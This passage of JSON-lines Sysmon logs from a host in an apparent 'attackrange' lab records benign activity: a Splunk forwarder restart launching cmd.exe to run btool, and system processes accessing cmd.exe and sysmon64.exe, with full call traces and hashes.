Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3245,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.975\r\nProcessGuid: {E2A3D6B1-10FF-5F25-0000-00107E5D0500}\r\nProcessId: 5076\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nParentProcessId: 4864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.975","ProcessGuid":"{E2A3D6B1-10FF-5F25-0000-00107E5D0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","ParentProcessId":"4864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3246,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nSourceProcessId: 4864\r\nSourceThreadId: 4872\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00107E5D0500}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","SourceProcessId":"4864","SourceThreadId":"4872","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00107E5D0500}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3247,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00107E5D0500}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00107E5D0500}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3248,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3249,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3250,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3251,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3252,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3253,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 